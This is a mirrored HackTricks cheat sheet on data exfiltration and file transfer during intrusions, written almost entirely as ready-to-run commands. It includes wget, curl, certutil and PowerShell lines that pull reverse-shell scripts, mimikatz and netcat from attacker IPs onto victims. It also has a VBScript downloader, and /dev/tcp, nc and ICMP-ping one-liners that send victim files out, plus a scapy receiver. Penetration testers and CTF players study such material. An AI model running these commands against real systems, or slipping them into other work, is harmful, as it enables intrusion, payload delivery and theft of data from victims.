mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
293 lines
7.1 KiB
Markdown
293 lines
7.1 KiB
Markdown
|
# Exfiltration
|
||
|
|
||
|
## Copy&Paste Base64
|
||
|
|
||
|
#### Linux
|
||
|
|
||
|
```bash
|
||
|
base64 -w0 <file> #Encode file
|
||
|
base64 -d file #Decode file
|
||
|
```
|
||
|
|
||
|
#### Windows
|
||
|
|
||
|
```text
|
||
|
certutil -encode payload.dll payload.b64
|
||
|
certutil -decode payload.b64 payload.dll
|
||
|
```
|
||
|
|
||
|
## HTTP
|
||
|
|
||
|
#### Linux
|
||
|
|
||
|
```bash
|
||
|
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
|
||
|
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
|
||
|
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
|
||
|
fetch 10.10.14.14:8000/shell.py #FreeBSD
|
||
|
```
|
||
|
|
||
|
#### Windows
|
||
|
|
||
|
```bash
|
||
|
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
|
||
|
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
|
||
|
|
||
|
#PS
|
||
|
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
|
||
|
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
|
||
|
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
|
||
|
|
||
|
Import-Module BitsTransfer
|
||
|
Start-BitsTransfer -Source $url -Destination $output
|
||
|
#OR
|
||
|
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
|
||
|
```
|
||
|
|
||
|
### Upload files
|
||
|
|
||
|
\*\*\*\*[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)\*\*\*\*
|
||
|
|
||
|
## FTP
|
||
|
|
||
|
### FTP server \(python\)
|
||
|
|
||
|
```bash
|
||
|
pip3 install pyftpdlib
|
||
|
python3 -m pyftpdlib -p 21
|
||
|
```
|
||
|
|
||
|
### FTP server \(NodeJS\)
|
||
|
|
||
|
```text
|
||
|
sudo npm install -g ftp-srv --save
|
||
|
ftp-srv ftp://0.0.0.0:9876 --root /tmp
|
||
|
```
|
||
|
|
||
|
### FTP server \(pure-ftp\)
|
||
|
|
||
|
```bash
|
||
|
apt-get update && apt-get install pure-ftp
|
||
|
```
|
||
|
|
||
|
```bash
|
||
|
#Run the following script to configure the FTP server
|
||
|
#!/bin/bash
|
||
|
groupadd ftpgroup
|
||
|
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
|
||
|
pure-pwd useradd fusr -u ftpuser -d /ftphome
|
||
|
pure-pw mkdb
|
||
|
cd /etc/pure-ftpd/auth/
|
||
|
ln -s ../conf/PureDB 60pdb
|
||
|
mkdir -p /ftphome
|
||
|
chown -R ftpuser:ftpgroup /ftphome/
|
||
|
/etc/init.d/pure-ftpd restart
|
||
|
```
|
||
|
|
||
|
### **Windows** client
|
||
|
|
||
|
```bash
|
||
|
#Work well with python. With pure-ftp use fusr:ftp
|
||
|
echo open 10.11.0.41 21 > ftp.txt
|
||
|
echo USER anonymous >> ftp.txt
|
||
|
echo anonymous >> ftp.txt
|
||
|
echo bin >> ftp.txt
|
||
|
echo GET mimikatz.exe >> ftp.txt
|
||
|
echo bye >> ftp.txt
|
||
|
ftp -n -v -s:ftp.txt
|
||
|
```
|
||
|
|
||
|
## SMB
|
||
|
|
||
|
Kali as server
|
||
|
|
||
|
```bash
|
||
|
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
|
||
|
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
|
||
|
#For new Win10 versions
|
||
|
impacket-smbserver -smb2support -user test -password test test `pwd`
|
||
|
```
|
||
|
|
||
|
Or create a **smb** share **using samba**:
|
||
|
|
||
|
```bash
|
||
|
apt-get install samba
|
||
|
mkdir /tmp/smb
|
||
|
chmod 777 /tmp/smb
|
||
|
#Add to the end of /etc/samba/smb.conf this:
|
||
|
[public]
|
||
|
comment = Samba on Ubuntu
|
||
|
path = /tmp/smb
|
||
|
read only = no
|
||
|
browsable = yes
|
||
|
guest ok = Yes
|
||
|
#Start samba
|
||
|
service smbd restart
|
||
|
```
|
||
|
|
||
|
Windows
|
||
|
|
||
|
```bash
|
||
|
CMD-Wind> \\10.10.14.14\path\to\exe
|
||
|
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
|
||
|
|
||
|
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
|
||
|
WindPS-2> cd new_disk:
|
||
|
```
|
||
|
|
||
|
## SCP
|
||
|
|
||
|
The attacker has to have SSHd running.
|
||
|
|
||
|
```bash
|
||
|
scp <username>@<Attacker_IP>:<directory>/<filename>
|
||
|
```
|
||
|
|
||
|
## NC
|
||
|
|
||
|
```bash
|
||
|
nc -lvnp 4444 > new_file
|
||
|
nc -vn <IP> 4444 < exfil_file
|
||
|
```
|
||
|
|
||
|
## /dev/tcp
|
||
|
|
||
|
### Download file from victim
|
||
|
|
||
|
```bash
|
||
|
nc -lvnp 80 > file #Inside attacker
|
||
|
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
|
||
|
```
|
||
|
|
||
|
### Upload file to victim
|
||
|
|
||
|
```bash
|
||
|
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
|
||
|
# Inside victim
|
||
|
exec 6< /dev/tcp/10.10.10.10/4444
|
||
|
cat <&6 > file.txt
|
||
|
```
|
||
|
|
||
|
thanks to **@BinaryShadow\_**
|
||
|
|
||
|
## **ICMP**
|
||
|
|
||
|
```bash
|
||
|
#In order to exfiltrate the content of a file via pings you can do:
|
||
|
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
|
||
|
#This will 4bytes per ping packet (you could probablie increase this until 16)
|
||
|
```
|
||
|
|
||
|
```python
|
||
|
from scapy.all import *
|
||
|
#This is ippsec receiver created in the HTB machine Mischief
|
||
|
def process_packet(pkt):
|
||
|
if pkt.haslayer(ICMP):
|
||
|
if pkt[ICMP].type == 0:
|
||
|
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
|
||
|
print(f"{data.decode('utf-8')}", flush=True, end="")
|
||
|
|
||
|
sniff(iface="tun0", prn=process_packet)
|
||
|
```
|
||
|
|
||
|
## **SMTP**
|
||
|
|
||
|
If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
|
||
|
|
||
|
```bash
|
||
|
sudo python -m smtpd -n -c DebuggingServer :25
|
||
|
```
|
||
|
|
||
|
## TFTP
|
||
|
|
||
|
By default in XP and 2003 \(in others it need to be explicitly added during installation\)
|
||
|
|
||
|
In Kali, **start TFTP server**:
|
||
|
|
||
|
```bash
|
||
|
#I didn't get this options working and I prefer the python option
|
||
|
mkdir /tftp
|
||
|
atftpd --daemon --port 69 /tftp
|
||
|
cp /path/tp/nc.exe /tftp
|
||
|
```
|
||
|
|
||
|
**TFTP server in python:**
|
||
|
|
||
|
```bash
|
||
|
pip install ptftpd
|
||
|
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
|
||
|
```
|
||
|
|
||
|
In **victim**, connect to the Kali server:
|
||
|
|
||
|
```bash
|
||
|
tftp -i <KALI-IP> get nc.exe
|
||
|
```
|
||
|
|
||
|
## PHP
|
||
|
|
||
|
Download a file with a PHP oneliner:
|
||
|
|
||
|
```bash
|
||
|
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
|
||
|
```
|
||
|
|
||
|
## VBScript
|
||
|
|
||
|
```bash
|
||
|
Attacker> python -m SimpleHTTPServer 80
|
||
|
```
|
||
|
|
||
|
#### Victim
|
||
|
|
||
|
```bash
|
||
|
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
|
||
|
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
|
||
|
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
|
||
|
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
|
||
|
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
|
||
|
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
|
||
|
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
|
||
|
echo Err.Clear >> wget.vbs
|
||
|
echo Set http = Nothing >> wget.vbs
|
||
|
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
|
||
|
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
|
||
|
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
|
||
|
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
|
||
|
echo http.Open "GET", strURL, False >> wget.vbs
|
||
|
echo http.Send >> wget.vbs
|
||
|
echo varByteArray = http.ResponseBody >> wget.vbs
|
||
|
echo Set http = Nothing >> wget.vbs
|
||
|
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
|
||
|
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
|
||
|
echo strData = "" >> wget.vbs
|
||
|
echo strBuffer = "" >> wget.vbs
|
||
|
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
|
||
|
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
|
||
|
echo Next >> wget.vbs
|
||
|
echo ts.Close >> wget.vbs
|
||
|
```
|
||
|
|
||
|
```bash
|
||
|
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
|
||
|
```
|
||
|
|
||
|
## Debug.exe
|
||
|
|
||
|
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
|
||
|
|
||
|
`Debug.exe` can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that:
|
||
|
|
||
|
```text
|
||
|
upx -9 nc.exe
|
||
|
```
|
||
|
|
||
|
Now it only weights 29 kb. Perfect. So now let's disassemble it:
|
||
|
|
||
|
```text
|
||
|
wine exe2bat.exe nc.exe nc.txt
|
||
|
```
|
||
|
|
||
|
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
|
||
|
|